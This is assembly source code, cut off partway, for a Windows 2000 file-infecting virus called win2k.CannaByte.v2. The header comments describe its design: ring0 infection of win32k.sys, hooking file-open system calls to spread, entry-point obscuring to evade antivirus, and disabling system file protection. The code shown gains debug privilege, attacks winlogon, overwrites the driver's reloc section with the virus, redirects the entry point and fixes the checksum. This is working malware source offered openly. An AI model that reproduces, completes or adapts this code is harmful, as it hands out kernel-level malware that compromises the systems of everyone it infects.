;win2k.CannaByte.v2 coded by (Super && vallez)
;
;IMPORTANT: THIS CODE IS ONLY FOR READ AND IF YOU WANT TEST IT. IM NOT RESPONSABLE IF YOU
;USE IT FOR BAD THINGS. IN ADDITION NOW THE VIRUS WILL INFECT WIN32K.SYS AND WILL HOOK 
;THE APIS BUT IT WILL INFECT ONLY ZZZ.EXE FILE SO FOR IT WORKS FULLY IT MUST BE MODIFIED.
;
;When a infected file arrives to a system it will infect the system.
;The expansion method will be to intercept NtCreateFile and NtOpenFile in SSDT,
;and infect all files that will be opened. 
;For that propose,the virus will try to go ring0 and intercept there system calls.
;For going to ring0 virus will infect win32k.sys and in the next restart the virus will 
;be loaded in ring0.
;Ill no explain lot of more things here coz virus is very commented so its easily 
;understandable.
;version 2 improvements:
;
;Cksum of win32k.sys calculated on the fly,without using apis.
;
;RING0 EPO infection:
;
;	The virus will infect in this manner: it will copy itself in reloc section,however,
;	it will take RVA of relocs. Then it will add a random offset from this RVA. In addition
;	reloc pointer will be erased from data directory. Avs will not able to start the
;	searching from a part of PE becoz the virus could be copied to any section and any
;	offset in the section. In addition the vx will infect using EPO:
;	The virus will search code section where entrypoint is there. It will calculate a random
;	offset from the start of the section. The offset could be between instructions..without
;	pointing a valid opcode. Here the super's theory comes:
;	
;	Super's Theory:
;
;	When u jump a random number of bytes in a buffer of code its possible u will
;	jump to a zone between instruction. For example: E8 11 22 33 44 its possible 
;	in a random jump you will stay pointing 11 or 22 instead instruction opcode E8.
;	but its possible redrive ur pointer to opcodes doing a route over the code
;	getting instruction lengths and adding them to your pointer, 16 times at max.
;	Then u will be in opcodes sure.
;
;	The theory was full tested and it works perfectly...x86 secrets :)
;	
;	Well,using the theory we can redrive our pointer to a valid opcode. From that 
;	opcode we will search a call, E8 XX XX XX XX. We will hook that call for 
;	giving the control the vx.
;
;	This method could be very powerfull: avs cannot search the vx at a fixed offset
;	and they cannot search the call at a fixed offset. They cannot start to search
;	the vx from the end of the file, becoz the virus could be far of there.
;	In big hosts they will need to read lot of bytes of the host for finding the vx.
;	
;	We are using length disassembler engine (lde32) by Z0mbie :) We love your engine.
;
;
;	Problems with EPO: we are copying the vx to a offset from relocs start. In the previous
;	version the virus infected more files, it had more space for infection. Now it will
;	discard more files. However infected files will be more difficult to detect.	
;
;
;Other improvements we would like to add with more time:
;
;	Worm support: today internet is the battlefield for vx. Well,this is my opinion:
;	infector viruses are powerful, becoz they are more difficult to be detected,coverall 
;	if they are using methods as EPO, poli/meta-morphism, cavity...and other powerful
;	techniques. However internet is succulent for viruses, and a good virus must have 
;	internet support. A very powerful virus would have to combine both things, a 
;	good infection method, difficulting detection, and a fast expansion method,using
;	internet. We want to add a worm part:
;	The worm part will be in ring3 sending random files from the infected machine. These
;	files will be infected by the hook in the ring0 vx part. 
;
;	Sfc disabling: now the virus is able to disable sfc in win2k using benny and ratter 
;	method. It would be interesting to add new methods for disabling sfc in all systems.
;	No string searching for patching better. Im sure in the next zine new methods will
;	appears, more generic methods,so it would be interesting to add them.
;
;	Full stealth in memory and disk: we are in ring0 hooking NtCreateFile and NtOpenFile...
;	why not a full stealth in disk for win32k.sys? no time now.. :( In the same manner
;	we would like to add full stealth in memory.
;
;
;THX TO:
;
;-As always Xezaw :) my dear m3nt0r ;) (THE BEST m3nt0r) I must say u thx coz that lot of 
;patience that u had haven with me :) im a "ceporro" (i dont know how to say this in 
;english xDD)
;-My second dear m3nt0r :) Super. How its possible u know all things i ask u? O_O xDD
;-VirusBust :) a good friend who helped me a lot of too.
;-Morphine: the most likeable girl in the undernet :D and in the world too! ;D i adore to
;speak with u :)
;Remains, ring0 machine :)
;-Pato,Nigthmare,isotope,ViR[-_-],MrHangman,Oyzzo,bi0s,... My best friends :)
;-Nmt,ur articles have helped me lot of :)
;-GriYo who always helped me too a lot of :) when i have needed.
;-Ratter&Benny: i dont know u but i must say ur articles and virus codes have helped me
;lot of very much.(When i added this line in parenthesys i already knew ratter and i must
;say thx again for ur help ;)
;-Z0mbie: ur engine is a boom!! :D
;-Well,"THX TO" part is the more difficult part to code coz always u will forget to thx
;somebody so i must say thx all people that i forget to put here :) 
;-And OfCorz a infinitely BIG THX TO 'Lady Marian' :********************* U r resident
;in my memory all time :D



.586p
.model flat,stdcall

extrn ExitProcess:proc
extrn GetLastError:proc
extrn GetModuleHandleA:proc


;29a files
include mz.inc
include pe.inc
include win32api.inc
include useful.inc


;macros

;;;;;;;;;;;;;;;;;;;;;;;
callz macro dir_call
db 0E8h
dd (dir_call - $ - 4)
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
jmpz macro dir_call
db 0E9h
dd (dir_call - $ -4)
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
CalcLenString macro
local loopin
push esi
dec esi
loopin:
inc esi
cmp byte ptr[esi],0
jne loopin
mov ecx,esi
pop esi
sub ecx,esi
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
GezApi macro BaseKernel,ApiCRC,ApiNameLen
mov eax,BaseKernel
mov edx,ApiCRC
mov ebx,ApiNameLen
callz GetApi
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen
GezApi BaseNtdll,ApiCRC,ApiNameLen
mov eax,[eax + 1]
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
syscallz macro fc,paramz ;from Ratter's win2k.Joss 
mov eax,fc
lea edx,[esp]
int 2eh
add esp,(paramz*4)
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov  [esp],esp ;for storing number of writted bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;
Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov  [esp],esp ;for storing number of read bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;


;APIS'S NAMES CRCS AND LENGHTS

LoadLibraryACRC             equ 3fc1bd8dh
LLNameLen                   equ 12
CloseHandleCRC 		    equ 0b09315f4h
CHNameLen      		    equ 11
FindFirstFileACRC           equ 0c9ebd5ceh
FFFNameLen                  equ 14
FindNextFileACRC            equ 75272948h
FNFNameLen                  equ 13
FindCloseCRC                equ 0d82bf69ah
FCNameLen                   equ 9
GetTickCountCRC             equ 5b4219f8h
GTCNameLen                  equ 12
WriteMemoryProcessCRC       equ 4f58972eh
WMPNameLen                  equ 18
ReadMemoryProcessCRC        equ 0f7c7ae42h
RMPNameLen                  equ 17
ResumeThreadCRC             equ 3872beb9h
RTNameLen                   equ 12
ExitProcessCRC              equ 251097CCh
EPNameLen                   equ 11
SetFileAttributesACRC       equ 156b9702h
SFANameLen                  equ 18
CreateFileACRC              equ 553b5c78h
CFNameLen                   equ 11
CreateFileMappingACRC       equ 0b41b926ch
CFMNameLen                  equ 18
MapViewOfFileCRC            equ 0A89b382fh
MVFNameLen                  equ 13
UnmapViewOfFileCRC          equ 391ab6afh
UVFNameLen                  equ 15
SetFileTimeCRC              equ 21804a03h
SFTNameLen                  equ 11
GetModuleHandleACRC         equ 0B1866570h
GMHNameLen                  equ 16
GetLastErrorCRC             equ 0d2e536b7h
GLENameLen                  equ 12
RegisterServiceProcessCRC   equ 3b5ef61fh
RSPNameLen                  equ 22
SetCurrentDirectoryACRC     equ 69b6849fh
SCDNameLen                  equ 20
GetCurrentDirectoryACRC     equ 0c79dc4e3h
GCDNameLen                  equ 20
GetWindowsDirectoryACRC     equ 0fff372beh
GWDNameLen                  equ 20
GetModuleFileNameACRC       equ 08bff7a0h
GMFNNameLen                 equ 18
CreateProcessACRC           equ 0a851d916h
CPNameLen                   equ 14
Module32FirstCRC            equ 38891c00h
M32FNameLen                 equ 13
Module32NextCRC             equ 0f6911852h
M32NNameLen                 equ 12
CreateToolhelp32SnapShotCRC equ 0c1f3b876h
CT32SNameLen                equ 24
VirtualProtectExCRC         equ 5d180413h
VPNameLen                   equ 16
GetCurrentProcessCRC        equ 0d0861aa4h        
GCPNameLen                  equ 17  
OpenProcessTokenCRC         equ 0f9c60615h
OPTNameLen                  equ 16
LookupPrivilegeValueACRC    equ 0da87bf62h
LPVNameLen                  equ 21
AdjustTokenPrivilegesCRC    equ 0de3e5cfh
ATPNameLen			    equ 21
EnumProcessesCRC            equ 0509a21ch
EPSNameLen			    equ 13
EnumProcessModulesCRC       equ 0dea82ac2h
EPMNameLen                  equ 18
GetModuleInformationCRC     equ 0f2a84636h
GMINameLen                  equ 20
SuspendThreadCRC            equ 0bd76ac31h
STNameLen                   equ 13
FreeLibraryCRC              equ 0da68238fh
FLNameLen                   equ 11
GetVersionCRC               equ 4ccf1a0fh
GVNameLen                   equ 10
RasDialACRC			    equ 0b88da156h
RDNameLen                   equ 8
GetModuleBaseNameACRC       equ 1720513eh
GMBNNameLen                 equ 18
OpenProcessCRC              equ 0df27514bh
OPNameLen 			    equ 11
ZwConnectPortCRC            equ 0cbaec255h
ZCPNameLen			    equ 13
NtConnectPortCRC  	    equ 0c88edce9h
NCPNameLen			    equ 13
ZwRequestPortCRC		    equ 0e28aebd1h
ZRPNameLen			    equ 13
DbgUiConnectToDbgCRC        equ 09a51ac3ah
DUCTDNameLen		    equ 17
DbgSsInitializeCRC          equ 0d198b351h
DSINameLen			    equ 15
DbgSsHandleKmApiMsgCRC      equ 2e9c4e99h
DSHKAMNameLen		    equ 19
GetCurrentProcessIdCRC      equ 1db413e3h
GCPINameLen                 equ 19
GetCurrentThreadIdCRC       equ 8df87e63h
GCTINameLen                 equ 18
WaitForDebugEventCRC        equ 96ab83a1h
WFDENameLen			    equ 17
ContinueDebugEventCRC       equ 0d8e77e49h
CDENameLen		          equ 18
VirtualAllocExCRC	          equ 0e62e824dh
VANameLen			    equ 14
CreateRemoteThreadCRC       equ 0ff808c10h
CRTNameLen                  equ 18
NtTerminateProcessCRC       equ 94fcb0c0h
NTPNameLen                  equ 18
ExitThreadCRC		    equ 80af62e1h
ETNameLen                   equ 10
GetCurrentDirectoryWCRC     equ 334971b2h
GCDWNameLen			    equ 20
FindFirstFileWCRC		    equ 3d3f609fh
FFFWNameLen                 equ 14
SleepCRC			    equ 0cef2eda8h
SNameLen                    equ 5
MoveFileACRC                equ 0de9ff0d1h
MFNameLen                   equ 9
MapFileAndCheckSumACRC      equ 462eeff7h
MFACSNameLen                equ 19
CheckSumMappedFileCRC	    equ 0bbb4966eh
CSMFNameLen			    equ 18
CopyFileACRC		    equ 0199dc99h
CpFNameLen			    equ 9
KeServiceDescriptorTableCRC equ 32a4d557h
KSDTNameLen			    equ 24
NtCreateFileCRC             equ 3ee6cc56h
NCFNameLen			    equ 12
ZwOpenFileCRC		    equ 0b679c176h
ZOFNameLen			    equ 10
ZwOpenSectionCRC		    equ 73bdfd70h
ZOSNameLen			    equ 13
ZwMapViewOfSectionCRC       equ 0d287ee26h
ZMVOSNameLen		    equ 18
ZwCloseCRC			    equ 180c0d23h
ZCNameLen	                equ 7
ZwCreateSectionCRC	    equ 2c919477h
ZCSNameLen			    equ 15
ZwUnmapViewOfSectionCRC     equ 9d35f923h
ZUVOSNameLen                equ 20
NtOpenFileCRC               equ 0a1b1dc21h
NOFNameLen                  equ 10
ZwDeleteFileCRC             equ 6967772dh
ZDFNameLen                  equ 12
DeleteFileACRC		    equ 919b6bcbh
DFNameLen			    equ 11
ZwCreateFileCRC		    equ 0a81a7cd4h 
ZCFNameLen			    equ 12
PsCreateSystemThreadCRC     equ 32adfc3ah
PCSTNameLen			    equ 20
KeQueryTickCountCRC	    equ 52d6480eh
KQTCNameLen			    equ 16


Kernel32CRC                 equ 204c64e5h 		;CRC of 'kernel32' string


TOKEN_PRIVILEGES struc
TP_count dd ?
TP_luid  dq ?
TP_attribz dd ?
TOKEN_PRIVILEGES ends


unicode_string struc
	us_Length        dw ?
	us_MaximumLength dw ?
      us_Buffer        dd ?
unicode_string ends


objects_attributes struc
	oa_length     dd ?    ;lenght of this structure
	oa_rootdir    dd ?    
	oa_objectname dd ?    ;name of the object
	oa_attribz    dd ?    ;attributes of the object
	oa_secdesc	  dd ?    
	oa_secqos     dd ?
objects_attributes ends


pio_status struc
	ps_ntstatus   dd ?
	ps_info       dd ?
pio_status ends


TOKEN_ASSIGN_PRIMARY     	    equ 00000001h
TOKEN_DUPLICATE          	    equ 00000002h
TOKEN_IMPERSONATE        	    equ 00000004h
TOKEN_QUERY              	    equ 00000008h
TOKEN_QUERY_SOURCE       	    equ 00000010h
TOKEN_ADJUST_PRIVILEGES  	    equ 00000020h
TOKEN_ADJUST_GROUPS      	    equ 00000040h
TOKEN_ADJUST_DEFAULT     	    equ 00000080h
TOKEN_ALL_ACCESS 			    equ STANDARD_RIGHTS_REQUIRED or \
						  TOKEN_ASSIGN_PRIMARY     or \
						  TOKEN_DUPLICATE          or \
						  TOKEN_IMPERSONATE        or \
						  TOKEN_QUERY              or \
						  TOKEN_QUERY_SOURCE       or \
						  TOKEN_ADJUST_PRIVILEGES  or \
						  TOKEN_ADJUST_GROUPS      or \
						  TOKEN_ADJUST_DEFAULT
SE_PRIVILEGE_ENABLED 	 	    equ 00000002h
CHECKSUM_SUCCESS         	    equ 00000000h
CHECKSUM_OPEN_FAILURE    	    equ 00000001h
CHECKSUM_MAP_FAILURE     	    equ 00000002h
CHECKSUM_MAPVIEW_FAILURE 	    equ 00000003h
CHECKSUM_UNICODE_FAILURE 	    equ 00000004h
OBJ_CASE_INSENSITIVE 		    equ 00000040h
FILE_DIRECTORY_FILE               equ 00000001h
FILE_WRITE_THROUGH                equ 00000002h
FILE_SEQUENTIAL_ONLY 		    equ 00000004h
FILE_NO_INTERMEDIATE_BUFFERING    equ 00000008h
FILE_SYNCHRONOUS_IO_ALERT 	    equ 00000010h
FILE_SYNCHRONOUS_IO_NONALERT      equ 00000020h
FILE_NON_DIRECTORY_FILE 	    equ 00000040h
FILE_CREATE_TREE_CONNECTION 	    equ 00000080h
FILE_COMPLETE_IF_OPLOCKED 	    equ 00000100h
FILE_NO_EA_KNOWLEDGE 		    equ 00000200h
FILE_OPEN_FOR_RECOVERY            equ 00000400h
FILE_RANDOM_ACCESS                equ 00000800h
FILE_DELETE_ON_CLOSE              equ 00001000h
FILE_OPEN_BY_FILE_ID              equ 00002000h
FILE_OPEN_FOR_BACKUP_INTENT       equ 00004000h
FILE_NO_COMPRESSION               equ 00008000h
FILE_RESERVE_OPFILTER             equ 00100000h
FILE_OPEN_REPARSE_POINT           equ 00200000h
FILE_OPEN_NO_RECALL               equ 00400000h
FILE_OPEN_FOR_FREE_SPACE_QUERY    equ 00800000h
FILE_COPY_STRUCTURED_STORAGE      equ 00000041h
FILE_STRUCTURED_STORAGE           equ 00000441h
FILE_VALID_OPTION_FLAGS           equ 00ffffffh
FILE_VALID_PIPE_OPTION_FLAGS      equ 00000032h
FILE_VALID_MAILSLOT_OPTION_FLAGS  equ 00000032h
FILE_VALID_SET_FLAGS              equ 00000036h
FILE_SHARE_READ			    equ 00000001h
FILE_SHARE_WRITE                  equ 00000002h
FILE_READ_DATA			    equ 00000001h
FILE_WRITE_DATA		          equ 00000002h
FILE_APPEND_DATA			    equ 00000004h
FILE_OPEN_IF			    equ 00000003h
FILE_OPEN				    equ 00000001h
FILE_NON_DIRECTORY_FILE	          equ 00000040h
STATUS_SUCCESS			    equ 00000000h
SEC_COMMIT				    equ 08000000h	
SECTION_QUERY 			    equ 00000001h
SECTION_MAP_WRITE 		    equ 00000002h
SECTION_MAP_READ 		          equ 00000004h
SECTION_MAP_EXECUTE               equ 00000008h
SECTION_EXTEND_SIZE 		    equ 00000010h
STANDART_RIGTHS_REQUIRED          equ 000F0000h
SYNCHRONIZE                       equ 00100000h
THREAD_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE +  3FFh)

STARTUPINFOSIZE                   equ 68
PROCESSINFORMATIONSIZE   	    equ 16
cPushfd   			 	    equ  4
tamvirus = evirus - svirus


.data;
;;;;;;

az db 'KeQueryTickCount',0
azz db 'WriteProfileStringA',0
vallez db 'vallez for 29a',0

.code;
;;;;;;

start:
;;;;;;

;first generation codevvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv

xor ebp,ebp

lea esi,az
CalcLenString
mov edi,ecx
call CRC32
lea esi,azz
CalcLenString
mov edi,ecx
call CRC32

;unprotection of code for first gen
@pushsz "kernel32.dll"
call GetModuleHandleA
push eax
mov  esi,offset svirus
mov  ecx,evirus - svirus
xor  ebx,ebx
callz UnprotectMem
;This small code will move all code 1 byte up for simulate second gen...
lea edi,[evirus]
mov esi,edi
dec esi
mov ecx,evirus-svirus
std
rep movsb
cld
mov byte ptr[svirus],90h
pop eax
mov [ebp + NtKernel],eax 

jmp svirus


;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;


;first generation code^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX




;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv

svirus:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry Point Of Virus when is executed In ring3.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
EPointFile:

pushad
pushfd


int 3

;;;;;;;;;;;;;;;;;;;;;;;;
call d_offset                    ;I calculate delta offset
d_offset:
pop  ebp
sub ebp,offset d_offset 
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,dword ptr fs:[30h]       ;we ll get kernel address
mov eax,dword ptr [eax+0ch]
mov esi,dword ptr [eax+1ch]
lodsd
mov eax,dword ptr [eax+08h]
;eax->addr in kernel   
xor  ax,ax                       ;Ill get kernel address
add  eax,1000h
;eax -> a part of kernel32
SearchKernel:
sub  eax,1000h
cmp  word ptr [eax],'ZM'
jne  SearchKernel
;eax -> base of kernel32           
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
push eax                         ;i have unprotected the memory of code of virus
lea esi,[ebp + svirus]
mov ecx,tamvirus
xor ebx,ebx
callz UnprotectMem
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
pop eax				   ;I get other used librarys
mov [ebp + NtKernel],eax
callz GetLibrarys
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]	   ;Ill keep the current directory
GezApi eax,GetCurrentDirectoryACRC,GCDNameLen
lea ebx,[ebp + CurDir]
push ebx
push 256
call eax;we keep current dir for restoring
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov ecx,cs			         ;The virus will work in win2k only		
xor cl,cl
or ecx,ecx
jne Exit
mov eax,[ebp + NtKernel]         ;Im in NT but i want win2k...
GezApi eax,GetVersionCRC,GVNameLen
call eax
test eax,80000000h
jnz Exit
cmp al,5    			   ;i test for win2k(i think XP is 5 too but it will not work
jne Exit				   ;for win XP)
;Im not sure if this will work in NT previous machines perhaps but ill code for win2k.
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]	;we go to system32 directory first
GezApi eax,GetWindowsDirectoryACRC,GWDNameLen
push 256
lea ebx,[ebp + Buffer]
push ebx
call eax
lea esi,[ebp + Buffer]
CalcLenString
mov edi,esi
add edi,ecx
mov al,'\'
stosb
mov eax,'tsys'
stosd
mov eax,'23me'
stosd
xor al,al
mov [edi],al
mov eax,[ebp + NtKernel]
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + Buffer]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;


;I want to enable Debug privilege for token of this user. touch_privilege was coded by Ratter
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtAdvapi]		;enabling debug privilege for this user
GezApi eax,AdjustTokenPrivilegesCRC,ATPNameLen
mov [ebp + tAdjustTokenPrivileges],eax
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
mov [ebp + tCloseHandle],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,LookupPrivilegeValueACRC,LPVNameLen
mov [ebp + tLookupPrivilegeValueA],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,OpenProcessTokenCRC,OPTNameLen
mov [ebp + tOpenProcessToken],eax
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentProcessCRC,GCPNameLen
mov [ebp + tGetCurrentProcess],eax
push SE_PRIVILEGE_ENABLED
pop eax
@pushsz "SeDebugPrivilege"
pop esi
call touch_privilege
;;;;;;;;;;;;;;;;;;;;;;;;

;Now ill disable sfp with Benny&Ratter method
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
callz GetWinlogon			;I have debug priv so ill disable sfc with benny&ratter method
or eax,eax
jnz Exit
callz AttackWinlogon
or eax,eax
jnz Exit
;;;;;;;;;;;;;;;;;;;;;;;;


;Now infection of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;U will see in this part lot of move and copy files but i do it for ensuring the 
;perfect working of the virus...I had some problems with sfc disabling due this code
;was executed before sfc disabling code so finally win32k.sys was not infected the first
;time that virus was executed in that system uninfected still...but i have correct that
;problem doing some movings and copyings of files...that file here,that file there and
;virus works perfectly now ;P 



;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA] 	;Search win32k.sy
push eax
lea eax,[ebp + win32ksy]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
cmp eax,0FFFFFFFFh
je NoWin32sySoContinue
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
lea esi,[ebp + win32ksys]
push esi
mov eax,[ebp + NtKernel]		;deleting win32k.sys if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
mov eax,[ebp + NtKernel]            ;renaming win32k.sy to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32ksy]
push esi
call eax 
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
NoWin32sySoContinue:
mov eax,[ebp + NtKernel]              ;we copy win32k.sys to win32k.fuck
GezApi eax,CopyFileACRC,CpFNameLen
push 0
lea esi,[ebp + win32kfuck]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax 
;;;;;;;;;;;;;;;;;;;;;;;;


;Why of this?:
;The original win32k.sys is been used by the system so we can modify it...however we can
;change its name. We copy it to win32k.fuck and infect the .fuck file...
;later we renaming win32k.sys to win32k.sy and win32k.fuck to win32k.sys
;and this new win32k.sys will be loaded in ring0 the next time that system reboot.
;i copy .sys to .fuck for no infecting directly over win32k.sys
;coz i had problems...i tried to infect directly over win32k.sys but sometimes(lot of times)
;when i called functions as CreateFile or others, i got this error from GetLastError:
;32(20h)(The process cannot access the file because it is being used by another process)
;I supposed that win32k.sys is a file used lot of times and if i infected directly over
;win32k.sys i would get this error lot of times....so finally i decided to do a copy 
;named win32k.fuck for later renaming this file to win32k.sys when already infected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;Now ill infect win32k.fuck
;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA]       	;Mapping win32k.fuck
push eax
lea eax,[ebp + win32kfuck]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
mov [ebp + SearchHand],eax
cmp eax,0FFFFFFFFh
je Exit
callz MapFile
or eax,eax
jz Exit
;;;;;;;;;;;;;;;;;;;;;;;;


;INFECTION OF WIN32K.FUCK
;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + ViewHandle]             ;a simple infection overwriting reloc section
mov edx,eax
mov ebx,[eax + 3ch]
add eax,ebx
;eax -> PE
mov bx,word ptr [eax + 8]
cmp bx,'zs'
je StopInfection ;becoz already Infected
mov word ptr [eax + 8],'zs'  ;a small mark ;)
mov ebx,[eax + 28h]	     ;EPoint of win32k.sys
mov [ebp + EntryPointWin32ksys],ebx
xor ecx,ecx
mov cx,word ptr [eax + 6]
dec ecx
mov ebx,eax
add ebx,0F8h ;sections
GoToLastSection:
add ebx,28h
loop GoToLastSection
;ebx -> .reloc				 ;over-reloc infection of win32k.sys
cmp [ebx],'ler.'
jne StopInfection
mov dword ptr [ebx + 24h],040000040h ;reloc not discardable,readable,writable
mov ecx,[ebx + 10h]
cmp ecx,tamvirus
jb  StopInfection

;i change entry point of win32k.sys

mov edi,[ebx + 0ch]
add edi,EPointSystem - svirus
mov [eax + 28h],edi ;RVA new entry point for win32k.sys	

;ill copy the code overwriting .reloc

mov edi,[ebx + 14h]
add edi,edx
lea esi,[ebp + svirus]
mov ecx,tamvirus
rep movsb
;;;;;;;;;;;;;;;;;;;;;;;;

;IMPORTANT: I MUST CORRECT WIN32K.FUCK HEADER CKSUM AFTER INFECTION OR SYSTEM WILL NOT START
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
;In the previous version of the virus the cksum of win32k.sys was calculated with 
;MapFileAndCheckSumA api. In this version we will calculate it on the fly.

mov esi,[ebp + ViewHandle] 		;esi->start of buffer
lea ecx,[ebp + _WIN32_FIND_DATA]
mov ecx,[ecx.WFD_nFileSizeLow]
shr ecx,1 					;ecx=len of total buf in words for calculating the cksum
mov ebx,[esi + 3ch]
add ebx,esi
lea edx,[ebx.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_CheckSum] ;edx=addr of dword for skipping
xor edi,edi                         ;in edi will be the resulting cksum

CalcCksum:
cmp esi,edx
jne ContinueCksum
add esi,4
sub ecx,2
jmp CalcCksum
ContinueCksum:
push eax
movzx eax,word ptr [esi]
add edi,eax
pop eax
add esi,2
test edi,0FFFF0000h
jz ContinueCksum2
inc edi
and edi,0000FFFFh
ContinueCksum2:
loop CalcCksum
lea ecx,[ebp + _WIN32_FIND_DATA]
mov ecx,[ecx.WFD_nFileSizeLow]
add edi,ecx
mov [ebx.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_CheckSum],edi ;calculated cksum
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,'szsz'
StopInfection:			    ;Unmmaping win32k.fuck
push eax
callz CloseAll
pop eax
cmp eax,'szsz'
jne SysAlreadyInfected
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
push dword ptr [ebp + SearchHand]   ;Closing the search hand
mov eax,[ebp + NtKernel]
